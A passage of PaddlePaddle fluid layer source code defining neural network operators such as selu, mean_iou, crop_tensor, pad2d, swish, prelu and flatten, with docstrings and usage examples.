img = np.array([[0, 1],[2, 3]]).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'x':img}, fetch_list=[output])
print(res) # [array([[0. , 1.050701],[2.101402, 3.152103]], dtype=float32)]
"""
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'selu')
helper = LayerHelper('selu', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
attrs = {}
if scale is not None:
attrs["scale"] = scale
if alpha is not None:
attrs["alpha"] = alpha
helper.append_op(
type="selu", inputs={"X": x}, outputs={"Out": out}, attrs=attrs)
return out
def mean_iou(input, label, num_classes):
"""
Mean Intersection-Over-Union is a common evaluation metric for
semantic image segmentation, which first computes the IOU for each
semantic class and then computes the average over classes.
IOU is defined as follows:
.. math::
IOU = \\frac{true\_positive}{(true\_positive + false\_positive + false\_negative)}.
The predictions are accumulated in a confusion matrix and mean-IOU
is then calculated from it.
Parameters:
input (Variable): A n-D Tensor of prediction results for semantic labels with type int32 or int64.
label (Variable): A Tensor of ground truth labels with type int32 or int64.
Its shape should be the same as input.
num_classes (int32): The possible number of labels.
Returns:
Three Variables.
- mean_iou(Variable) : A 1-D Tensor representing the mean intersection-over-union with shape [1]. \
Data type is float32.
- out_wrong(Variable) : A 1-D Tensor with shape [num_classes]. Data type is int32. \
The wrong numbers of each class.
- out_correct(Variable): A 1-D Tensor with shape [num_classes]. Data type is int32. The correct numbers of each class.
Examples:
.. code-block:: python
import paddle.fluid as fluid
iou_shape = [None, 32, 32]
num_classes = 5
predict = fluid.data(name='predict', shape=iou_shape, dtype='int64')
label = fluid.data(name='label', shape=iou_shape, dtype='int64')
mean_iou, out_wrong, out_correct = fluid.layers.mean_iou(predict, label,
num_classes)
"""
helper = LayerHelper('mean_iou', **locals())
dtype = helper.input_dtype()
out_mean_iou = helper.create_variable_for_type_inference(dtype='float32')
out_wrong = helper.create_variable_for_type_inference(dtype='int32')
out_correct = helper.create_variable_for_type_inference(dtype='int32')
helper.append_op(
type="mean_iou",
inputs={"Predictions": input,
"Labels": label},
outputs={
"OutMeanIou": out_mean_iou,
"OutWrong": out_wrong,
"OutCorrect": out_correct
},
attrs={"num_classes": num_classes})
return out_mean_iou, out_wrong, out_correct
def crop(x, shape=None, offsets=None, name=None):
"""
Crop input into output, as specified by offsets and shape.
**Warning:** THIS OP IS DEPRECATED. It will be removed in the future version.
Instructions for updating: Use :ref:`api_fluid_layers_crop_tensor` instead.
.. code-block:: text
* Case 1:
Given
X = [[0, 1, 2, 0, 0]
[0, 3, 4, 0, 0]
[0, 0, 0, 0, 0]],
and
shape = [2, 2],
offsets = [0, 1],
output is:
Out = [[1, 2],
[3, 4]].
* Case 2:
Given
X = [[0, 1, 2, 5, 0]
[0, 3, 4, 6, 0]
[0, 0, 0, 0, 0]],
and shape is tensor
shape = [[0, 0, 0]
[0, 0, 0]]
and
offsets = [0, 1],
output is:
Out = [[1, 2, 5],
[3, 4, 6]].
Parameters:
x (Variable): Tensor, data type can be float32 or float64.
shape (Variable|list/tuple of integers): The output shape is specified
by `shape`, which can be a Tensor or a list/tuple of integers.
If it is a Tensor, it's rank must be the same as `x` , only
it's shape will be used, and the value of it will be ignored. This way
is suitable for the case that the output shape may be changed each
iteration. If it is a list/tuple of integers, it's length must be the same
as the rank of `x`
offsets (Variable|list/tuple of integers|None): Specifies the cropping
offsets at each dimension. It can be a Tensor or a list/tuple
of integers. If it is a Tensor, it's rank must be the same as `x`.
This way is suitable for the case that the offsets may be changed
each iteration. If it is a list/tuple of integers, it's length must be the
same as the rank of `x`. If None, the offsets are 0 at each dimension.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name` . Usually name is no need to set and
None by default.
Returns:
The cropped Tensor, which has the same rank and data type with `x`
Return Type:
Variable
Raises:
ValueError: If shape is not a list, tuple or Variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name="x", shape=[3, 3, 5], dtype="float32")
y = fluid.data(name="y", shape=[2, 2, 3], dtype="float32")
crop = fluid.layers.crop(x, shape=y)
# or
z = fluid.data(name="z", shape=[3, 3, 5], dtype="float32")
crop = fluid.layers.crop(z, shape=[2, 2, 3])
"""
helper = LayerHelper('crop', **locals())
if not (isinstance(shape, list) or isinstance(shape, tuple) or \
isinstance(shape, Variable)):
raise ValueError("The shape should be a list, tuple or Variable.")
if offsets is None:
offsets = [0] * len(x.shape)
out = helper.create_variable_for_type_inference(x.dtype)
ipts = {'X': x}
attrs = {}
if isinstance(shape, Variable):
ipts['Y'] = shape
else:
attrs['shape'] = shape
if isinstance(offsets, Variable):
ipts['Offsets'] = offsets
else:
attrs['offsets'] = offsets
helper.append_op(
type='crop',
inputs=ipts,
outputs={'Out': out},
attrs=None if len(attrs) == 0 else attrs)
return out
def crop_tensor(x, shape=None, offsets=None, name=None):
"""
Crop input into output, as specified by offsets and shape.
.. code-block:: text
* Case 1 (input is a 2-D Tensor):
Input:
X.shape = [3, 5]
X.data = [[0, 1, 2, 0, 0],
[0, 3, 4, 0, 0],
[0, 0, 0, 0, 0]]
Parameters:
shape = [2, 2]
offsets = [0, 1]
Output:
Out.shape = [2, 2]
Out.data = [[1, 2],
[3, 4]]
* Case 2 (input is a 3-D Tensor):
Input:
X.shape = [2, 3, 4]
X.data = [[[0, 1, 2, 3],
[0, 5, 6, 7],
[0, 0, 0, 0]],
[[0, 3, 4, 5],
[0, 6, 7, 8],
[0, 0, 0, 0]]]
Parameters:
shape = [2, 2, -1]
offsets = [0, 0, 1]
Output:
Out.shape = [2, 2, 3]
Out.data = [[[1, 2, 3],
[5, 6, 7]],
[[3, 4, 5],
[6, 7, 8]]]
Parameters:
x (Variable): 1-D to 6-D Tensor, the data type is float32, float64, int32 or int64.
shape (list|tuple|Variable): The output shape is specified
by `shape`. Its data type is int32. If a list/tuple, it's length must be
the same as the dimension size of `x`. If a Variable, it should be a 1-D Tensor.
When it is a list, each element can be an integer or a Tensor of shape: [1].
If Variable contained, it is suitable for the case that the shape may
be changed each iteration.
offsets (list|tuple|Variable, optional): Specifies the cropping
offsets at each dimension. Its data type is int32. If a list/tuple, it's length
must be the same as the dimension size of `x`. If a Variable, it should be a 1-D
Tensor. When it is a list, each element can be an integer or a Tensor of shape: [1].
If Variable contained, it is suitable for the case that the offsets may be changed
each iteration. Default: None, the offsets are 0 at each dimension.
name(str, optional): The default value is None. Normally there is no need for user to set
this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: The cropped Tensor has same data type with `x`.
Raises:
TypeError: If the data type of `x` is not in: float32, float64, int32, int64.
TypeError: If `shape` is not a list, tuple or Variable.
TypeError: If the data type of `shape` is not int32.
TypeError: If `offsets` is not None and not a list, tuple or Variable.
TypeError: If the data type of `offsets` is not int32.
ValueError: If the element in `offsets` is less than zero.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name="x", shape=[None, 3, 5], dtype="float32")
# x.shape = [-1, 3, 5], where -1 indicates batch size, and it will get the exact value in runtime.
# shape is a 1-D Tensor
crop_shape = fluid.data(name="crop_shape", shape=[3], dtype="int32")
crop0 = fluid.layers.crop_tensor(x, shape=crop_shape)
# crop0.shape = [-1, -1, -1], it means crop0.shape[0] = x.shape[0] in runtime.
# or shape is a list in which each element is a constant
crop1 = fluid.layers.crop_tensor(x, shape=[-1, -1, 3], offsets=[0, 1, 0])
# crop1.shape = [-1, 2, 3]
# or shape is a list in which each element is a constant or Variable
y = fluid.data(name="y", shape=[3, 8, 8], dtype="float32")
dim1 = fluid.data(name="dim1", shape=[1], dtype="int32")
crop2 = fluid.layers.crop_tensor(y, shape=[3, dim1, 4])
# crop2.shape = [3, -1, 4]
# offsets is a 1-D Tensor
crop_offsets = fluid.data(name="crop_offsets", shape=[3], dtype="int32")
crop3 = fluid.layers.crop_tensor(x, shape=[-1, 2, 3], offsets=crop_offsets)
# crop3.shape = [-1, 2, 3]
# offsets is a list in which each element is a constant or Variable
offsets_var = fluid.data(name="dim1", shape=[1], dtype="int32")
crop4 = fluid.layers.crop_tensor(x, shape=[-1, 2, 3], offsets=[0, 1, offsets_var])
# crop4.shape = [-1, 2, 3]
"""
helper = LayerHelper('crop_tensor', **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'int32', 'int64'],
'crop_tensor')
check_type(shape, 'shape', (list, tuple, Variable), 'crop_tensor')
check_type(offsets, 'offsets', (list, tuple, Variable, type(None)),
'crop_tensor')
if offsets is None:
offsets = [0] * len(x.shape)
out = helper.create_variable_for_type_inference(x.dtype)
ipts = {'X': x}
attrs = {}
def _attr_shape_check(shape_val):
if not isinstance(shape_val, int):
raise TypeError(
"Attr(shape)'s dtype of Op(crop_tensor) should be int32, but received: %s."
% type(shape_val))
if shape_val == 0:
raise ValueError(
"Attr(shape) of Op(crop_tensor) should not be zero, but received: %s."
% str(shape_val))
if shape_val < -1:
raise ValueError(
"When the element in Attr(shape) of Op(crop_tensor) is negative, only -1 is supported, but received: %s."
% str(shape_val))
def _attr_offsets_check(offset_val):
if not isinstance(offset_val, int):
raise TypeError(
"Attr(offsets)'s dtype of Op(crop_tensor) should be int32, but received: %s."
% type(offset_val))
if offset_val < 0:
raise ValueError(
"Attr(offsets) of Op(crop_tensor) should be greater or equal to zero, but received: %s."
% str(offset_val))
if isinstance(offsets, Variable):
offsets.stop_gradient = True
ipts['Offsets'] = offsets
attrs['offsets'] = [-1] * len(x.shape)
elif utils._contain_var(offsets):
new_offsets_tensor = []
offsets_attr = []
for dim in offsets:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_offsets_tensor.append(dim)
offsets_attr.append(-1)
else:
_attr_offsets_check(dim)
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', dim, force_cpu=True, out=temp_out)
new_offsets_tensor.append(temp_out)
offsets_attr.append(dim)
ipts['OffsetsTensor'] = new_offsets_tensor
attrs['offsets'] = offsets_attr
else:
for offset in offsets:
_attr_offsets_check(offset)
attrs['offsets'] = offsets
if isinstance(shape, Variable):
shape.stop_gradient = True
ipts['Shape'] = shape
elif utils._contain_var(shape):
new_shape_tensor = []
shape_attr = []
for dim_size in shape:
if isinstance(dim_size, Variable):
dim_size.stop_gradient = True
new_shape_tensor.append(dim_size)
shape_attr.append(0)
else:
_attr_shape_check(dim_size)
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant(
[1], 'int32', dim_size, force_cpu=True, out=temp_out)
new_shape_tensor.append(temp_out)
shape_attr.append(dim_size)
ipts['ShapeTensor'] = new_shape_tensor
attrs['shape'] = shape_attr
else:
for dim_size in shape:
_attr_shape_check(dim_size)
attrs['shape'] = shape
helper.append_op(
type='crop_tensor',
inputs=ipts,
outputs={'Out': out},
attrs=None if len(attrs) == 0 else attrs)
return out
def affine_grid(theta, out_shape, name=None):
"""
It generates a grid of (x,y) coordinates using the parameters of
the affine transformation that correspond to a set of points where
the input feature map should be sampled to produce the transformed
output feature map.
Args:
theta (Variable) - A Tensor with shape [N, 2, 3]. It contains a batch of affine transform parameters.
The data type can be float32 or float64.
out_shape (Variable | list | tuple): The shape of target output with format [batch_size, channel, height, width].
``out_shape`` can be a Tensor or a list or tuple. The data
type must be int32.
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`.
Returns:
Variable: A Tensor with shape [batch_size, H, W, 2] while 'H' and 'W' are the height and width of feature map in affine transformation. The data type is the same as `theta`.
Raises:
ValueError: If the type of arguments is not supported.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
place = fluid.CPUPlace()
theta = fluid.data(name="x", shape=[None, 2, 3], dtype="float32")
out_shape = fluid.data(name="y", shape=[4], dtype="int32")
grid_0 = fluid.layers.affine_grid(theta, out_shape)
grid_1 = fluid.layers.affine_grid(theta, [5, 3, 28, 28])
batch_size=2
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
output= exe.run(feed={"x": np.random.rand(batch_size,2,3).astype("float32"),
"y": np.array([5, 3, 28, 28]).astype("int32")},
fetch_list=[grid_0.name, grid_1.name])
print(output[0])
print(output[1])
"""
helper = LayerHelper('affine_grid')
if not (isinstance(out_shape, list) or isinstance(out_shape, tuple) or \
isinstance(out_shape, Variable)):
raise ValueError("The out_shape should be a list, tuple or Variable.")
if not isinstance(theta, Variable):
raise ValueError("The theta should be a Variable.")
out = helper.create_variable_for_type_inference(theta.dtype)
ipts = {'Theta': theta}
attrs = {}
if isinstance(out_shape, Variable):
ipts['OutputShape'] = out_shape
else:
attrs['output_shape'] = out_shape
helper.append_op(
type='affine_grid',
inputs=ipts,
outputs={'Output': out},
attrs=None if len(attrs) == 0 else attrs)
return out
def pad2d(input,
paddings=[0, 0, 0, 0],
mode='constant',
pad_value=0.0,
data_format="NCHW",
name=None):
"""
Pad 2-d images according to 'paddings' and 'mode'.
If mode is 'reflect', paddings[0] and paddings[1] must be no greater
than height-1. And the width dimension has the same condition.
Parameters:
input (Variable): The input image with [N, C, H, W] format or [N, H, W, C] format, which is a 4-D Tensor with data type float32.
paddings (Variable | List[int32]): The padding size. If padding is a List, it must
contain four integers, (padding_top, padding_bottom, padding_left, padding_right).
Otherwise, it is a 1-D Tensor with shape [4]. Data type is int32.
Default is [0, 0, 0, 0].
mode (str): Three modes: 'constant' (default), 'reflect', 'edge' .
When in 'constant' mode, this op uses a constant value to pad the input tensor.
When in 'reflect' mode, uses reflection of the input boundaries to pad the input tensor.
When in 'edge' mode, uses input boundaries to pad the input tensor.
Default is 'constant'
pad_value (float32): The value to fill the padded areas in 'constant' mode . Default is 0.0
data_format (str): An string from: "NHWC", "NCHW". Specify the data format of
the input data.
Default is "NCHW"
name (str, optional) : The default value is None. Normally there is no need for
user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns: a 4-D Tensor padded according to paddings and mode and data type is same as input.
Return Type: Variable
Examples:
.. code-block:: text
Input = [[[[1., 2., 3.],
[4., 5., 6.]]]]
Case 0:
paddings = [0, 1, 2, 3],
mode = 'constant'
pad_value = 0
Out = [[[[0., 0., 1., 2., 3., 0., 0., 0.],
[0., 0., 4., 5., 6., 0., 0., 0.],
[0., 0., 0., 0., 0., 0., 0., 0.]]]]
Case 1:
paddings = [0, 1, 2, 1],
mode = 'reflect'
Out = [[[[3., 2., 1., 2., 3., 2.],
[6., 5., 4., 5., 6., 5.],
[3., 2., 1., 2., 3., 2.]]]]
Case 2:
paddings = [0, 1, 2, 1],
mode = 'edge'
Out = [[[[1., 1., 1., 2., 3., 3.],
[4., 4., 4., 5., 6., 6.],
[4., 4., 4., 5., 6., 6.]]]]
Code Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.data(name='data', shape=[None, 3, 32, 32], dtype='float32')
result = fluid.layers.pad2d(input=data, paddings=[0, 1, 2, 3], mode='reflect')
"""
if in_dygraph_mode():
_paddings = paddings.numpy().tolist() if isinstance(
paddings, Variable) else paddings
return core.ops.pad2d(input, 'mode', mode, 'pad_value', pad_value,
'data_format', data_format, 'paddings', _paddings)
attrs = {'mode': mode, 'pad_value': pad_value, 'data_format': data_format}
inputs = {'X': [input]}
if isinstance(paddings, Variable):
inputs['Paddings'] = [paddings]
attrs['paddings'] = []
else:
attrs['paddings'] = paddings
helper = LayerHelper('pad2d', **locals())
assert mode in ['reflect', 'edge', 'constant'
], "mode should be one of constant, reflect, edge."
dtype = helper.input_dtype(input_param_name='input')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type='pad2d', inputs=inputs, outputs={"Out": out}, attrs=attrs)
return out
@templatedoc()
def elu(x, alpha=1.0, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
alpha(${alpha_type}|1.0): ${alpha_comment}
name(str|None): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`.
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
input_elu = np.array([[-1,6],[1,15.6]])
with fluid.dygraph.guard():
x = fluid.dygraph.to_variable(input_elu)
y = fluid.layers.elu(x, alpha=0.2)
print(y.numpy())
# [[-0.12642411 6. ]
# [ 1. 15.6 ]]
"""
helper = LayerHelper('elu', **locals())
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'elu')
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='elu',
inputs={'X': x},
outputs={'Out': out},
attrs={'alpha': alpha})
return out
@templatedoc()
def relu6(x, threshold=6.0, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
threshold(float, optional): ${threshold_comment}
name(str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
output(${out_type}): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
in1 = np.array([[-1,0],[2.5,7.8]])
with fluid.dygraph.guard():
x1 = fluid.dygraph.to_variable(in1)
out1 = fluid.layers.relu6(x=x1, threshold=6.0)
print(out1.numpy())
# [[0. 0. ]
# [2.5 6. ]]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'relu6')
helper = LayerHelper('relu6', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='relu6',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold})
return out
@templatedoc()
def pow(x, factor=1.0, name=None):
"""
This is Pow Activation Operator.
:math:`out = x^{factor}`
Args:
x(Variable): A ``Tensor`` or ``LoDTensor`` . The data type is ``float32`` or ``float64``.
factor(float32|Variable, optional): A scalar with type ``float32`` or a ``Tensor`` with shape [1] and type ``float32``. The exponential factor of Pow. Default 1.0.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: A ``Tensor`` or ``LoDTensor``. The data type is same as ``x``.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name="x", shape=[32,32], dtype="float32")
# example 1: argument factor is float
y_1 = fluid.layers.pow(x, factor=2.0)
# y_1 is x^{2.0}
# example 2: argument factor is Variable
factor_tensor = fluid.layers.fill_constant([1], "float32", 3.0)
y_2 = fluid.layers.pow(x, factor=factor_tensor)
# y_2 is x^{3.0}
"""
check_variable_and_dtype(x, 'x', ['int32', 'int64', 'float32', 'float64'],
'pow')
helper = LayerHelper('pow', **locals())
inputs = {'X': x}
attrs = {}
if isinstance(factor, Variable):
check_variable_and_dtype(factor, 'factor', ['float32'], 'pow')
factor.stop_gradient = True
inputs['FactorTensor'] = factor
else:
attrs['factor'] = factor
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='pow', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
@templatedoc()
def stanh(x, scale_a=0.67, scale_b=1.7159, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
scale_a(${scale_a_type}|2.0 / 3.0): ${scale_a_comment}
scale_b(${scale_b_type}|1.7159): ${scale_b_comment}
name(str|None): A name for this layer(optional). If set None, the layer
will be named automatically.
Returns:
output(${out_type}): ${out_comment}.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
data = fluid.data(name="input", shape=[-1, 3])
result = fluid.layers.stanh(data,scale_a=0.67, scale_b=1.72)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
x = np.random.random(size=(3, 3)).astype('float32')
output= exe.run(feed={"input": x},
fetch_list=[result])
print(output)
#[array([[0.626466 , 0.89842904, 0.7501062 ],
# [0.25147712, 0.7484996 , 0.22902708],
# [0.62705994, 0.23110689, 0.56902856]], dtype=float32)]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'stanh')
helper = LayerHelper('stanh', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='stanh',
inputs={'X': x},
outputs={'Out': out},
attrs={'scale_a': scale_a,
'scale_b': scale_b})
return out
@templatedoc()
def hard_sigmoid(x, slope=0.2, offset=0.5, name=None):
"""
${comment}
Parameters:
x (${x_type}): ${x_comment}
slope (float, optional): ${slope_comment}
offset (float, optional): ${offset_comment}
name (str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
data = fluid.layers.fill_constant(shape=[3, 2], value=0.5, dtype='float32') # [[0.5, 0.5], [0.5, 0.5], [0.5, 0.5]]
result = fluid.layers.hard_sigmoid(data) # [[0.6, 0.6], [0.6, 0.6], [0.6, 0.6]]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hard_sigmoid')
helper = LayerHelper('hard_sigmoid', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='hard_sigmoid',
inputs={'X': x},
outputs={'Out': out},
attrs={'slope': slope,
'offset': offset})
return out
@templatedoc()
def swish(x, beta=1.0, name=None):
"""
Elementwise swish activation function. See `Searching for Activation Functions <https://arxiv.org/abs/1710.05941>`_ for more details.
Equation:
.. math::
out = \\frac{x}{1 + e^{- beta * x}}
Args:
x(Variable): Tensor or LoDTensor, dtype: float32 or float64, the input of swish activation.
beta(float): Constant beta of swish operator, default 1.0.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`.
Returns:
Variable: Output of the swish activation, Tensor or LoDTensor, with the same dtype and shape with the input x.
Examples:
.. code-block:: python
# declarative mode
import numpy as np
from paddle import fluid
x = fluid.data(name="x", shape=(-1, 3), dtype="float32")
y = fluid.layers.swish(x, beta=2.0)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
start = fluid.default_startup_program()
main = fluid.default_main_program()
data = np.random.randn(2, 3).astype("float32")
exe.run(start)
y_np, = exe.run(main, feed={"x": data}, fetch_list=[y])
data
# array([[-1.1239197 , 1.3391294 , 0.03921051],
# [ 1.1970421 , 0.02440812, 1.2055548 ]], dtype=float32)
y_np
# array([[-0.2756806 , 1.0610548 , 0.01998957],
# [ 0.9193261 , 0.01235299, 0.9276883 ]], dtype=float32)
.. code-block:: python
# imperative mode
import numpy as np
from paddle import fluid
import paddle.fluid.dygraph as dg
data = np.random.randn(2, 3).astype("float32")
place = fluid.CPUPlace()
with dg.guard(place) as g:
x = dg.to_variable(data)
y = fluid.layers.swish(x)
y_np = y.numpy()
data
# array([[-0.0816701 , 1.1603649 , -0.88325626],
# [ 0.7522361 , 1.0978601 , 0.12987892]], dtype=float32)
y_np
# array([[-0.03916847, 0.8835007 , -0.25835553],
# [ 0.51126915, 0.82324016, 0.06915068]], dtype=float32)
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'swish')
helper = LayerHelper('swish', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='swish',
inputs={'X': x},
outputs={'Out': out},
attrs={'slope': beta})
return out
def prelu(x, mode, param_attr=None, name=None):
"""
Equation:
.. math::
y = \max(0, x) + \\alpha * \min(0, x)
There are three modes for the activation:
.. code-block:: text
all: All elements share same alpha.
channel: Elements in same channel share same alpha.
element: All elements do not share alpha. Each element has its own alpha.
Args:
x (Variable): The input Tensor or LoDTensor with data type float32.
mode (str): The mode for weight sharing.
param_attr(ParamAttr|None): The parameter attribute for the learnable
weight (alpha), it can be create by ParamAttr. None by default.
For detailed information, please refer to :ref:`api_fluid_ParamAttr`.
name(str|None): For detailed information, please refer
to :ref:`api_guide_Name`. Usually name is no need to set and
None by default.
Returns:
Variable:
output(Variable): The tensor or LoDTensor with the same shape as input.
The data type is float32.
Examples:
.. code-block:: python
import paddle.fluid as fluid
from paddle.fluid.param_attr import ParamAttr
x = fluid.data(name="x", shape=[None,5,10,10], dtype="float32")
mode = 'channel'
output = fluid.layers.prelu(
x,mode,param_attr=ParamAttr(name='alpha'))
"""
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'prelu')
helper = LayerHelper('prelu', **locals())
if mode not in ['all', 'channel', 'element']:
raise ValueError('mode should be one of all, channel, element.')
alpha_shape = [1]
if mode == 'channel':
alpha_shape = [1, x.shape[1], 1, 1]
elif mode == 'element':
alpha_shape = [1, x.shape[1], x.shape[2], x.shape[3]]
dtype = helper.input_dtype(input_param_name='x')
alpha = helper.create_parameter(
attr=helper.param_attr,
shape=alpha_shape,
dtype='float32',
is_bias=False,
default_initializer=Constant(0.25))
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="prelu",
inputs={"X": x,
'Alpha': alpha},
attrs={"mode": mode},
outputs={"Out": out})
return out
@templatedoc()
def brelu(x, t_min=0.0, t_max=24.0, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
t_min(${t_min_type}|0.0): ${t_min_comment}
t_max(${t_max_type}|24.0): ${t_max_comment}
name(str|None): The default value is None. Normally there is no need for user to set this property.
For more information, please refer to :ref:`api_guide_Name`.
Returns:
${out_type}: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
input_brelu = np.array([[-1,6],[1,15.6]])
with fluid.dygraph.guard():
x = fluid.dygraph.to_variable(input_brelu)
y = fluid.layers.brelu(x, t_min=1.0, t_max=10.0)
print(y.numpy())
#[[ 1. 6.]
#[ 1. 10.]]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'brelu')
helper = LayerHelper('brelu', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='brelu',
inputs={'X': x},
outputs={'Out': out},
attrs={'t_min': t_min,
't_max': t_max})
return out
@templatedoc()
def leaky_relu(x, alpha=0.02, name=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
alpha(${alpha_type}|0.02): ${alpha_comment}
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
output(${out_type}): ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph Organizing
x = fluid.layers.data(name="x", shape=[2], dtype="float32")
res = fluid.layers.leaky_relu(x, alpha=0.1)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[-1, 2], [3, -4]]).astype(np.float32)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i}, fetch_list=[res])
print(res_val) # [[-0.1, 2], [3, -0.4]]
"""
if in_dygraph_mode():
return core.ops.leaky_relu(x, 'alpha', alpha)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'leaky_relu')
inputs = {'X': [x]}
attrs = {'alpha': alpha}
helper = LayerHelper('leaky_relu', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='leaky_relu', inputs=inputs, outputs={'Out': out}, attrs=attrs)
return out
def soft_relu(x, threshold=40.0, name=None):
"""
SoftRelu Activation Operator.
$out = \ln(1 + \exp(\max(\min(x, threshold), -threshold)))$
Args:
x(Variable): Input of soft_relu operator. Data type can be float32, float64.
threshold(float, optional): The threshold value of soft_relu, default value being 40.0.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable(Tensor|LoDTensor)): Output of soft_relu operator, shape and LoD same as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
inputs = fluid.layers.data(name="x", shape=[2, 2], dtype="float32")
output = fluid.layers.soft_relu(inputs, threshold=20.0)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img = np.array([[0, 1],[2, 3]]).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'x':img}, fetch_list=[output])
print(res) # [array([[0.6931472, 1.3132616], [2.126928 , 3.0485873]], dtype=float32)]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'soft_relu')
helper = LayerHelper('soft_relu', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='soft_relu',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold})
return out
def flatten(x, axis=1, name=None):
"""
**Flatten op**
Flatten the input tensor into a 2D matrix.
For Example:
.. code-block:: text
Case 1:
Given
X.shape = (3, 100, 100, 4)
and
axis = 2
We get:
Out.shape = (3 * 100, 4 * 100)
Case 2:
Given
X.shape = (3, 100, 100, 4)
and
axis = 0
We get:
Out.shape = (1, 3 * 100 * 100 * 4)
Args:
x (Variable): A tensor of rank >= axis. A tensor with type float32,
float64, int8, int32, int64.
axis (int): Indicate up to which input dimensions (exclusive) should
be flattened to the outer dimension of the output.
The value for axis must be in the range [0, R], where R
is the rank of the input tensor. Default: 1.
name(str, Optional): For details, please refer to :ref:`api_guide_Name`.
Generally, no setting is required. Default: None.
Returns:
Variable: A 2D tensor with the contents of the input tensor, with input \
dimensions up to axis flattened to the outer dimension of \
the output and remaining input dimensions flattened into the \
inner dimension of the output. A Tensor with type same as input x.
Raises:
ValueError: If x is not a variable.
ValueError: If axis is not in range [0, rank(x)].
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name="x", shape=[4, 4, 3], dtype="float32")
# x shape is [4, 4, 3]
out = fluid.layers.flatten(x=x, axis=2)
# out shape is [16, 3]
"""
helper = LayerHelper('flatten', **locals())
if not (isinstance(x, Variable)):
raise ValueError("The input x should be a Variable")
if not (isinstance(axis, int)) or axis > len(x.shape) or axis < 0:
raise ValueError("The axis should be a int, and in range [0, rank(x)]")
out = helper.create_variable_for_type_inference(x.dtype)
x_shape = helper.create_variable_for_type_inference(x.dtype)
helper.append_op(
type='flatten2',
inputs={"X": x},
outputs={'Out': out,
'XShape': x_shape},
attrs={"axis": axis})
return out
def stack(x, axis=0):
"""
This OP stacks all the inputs :code:`x` along axis.
.. code-block:: text
Case 1:
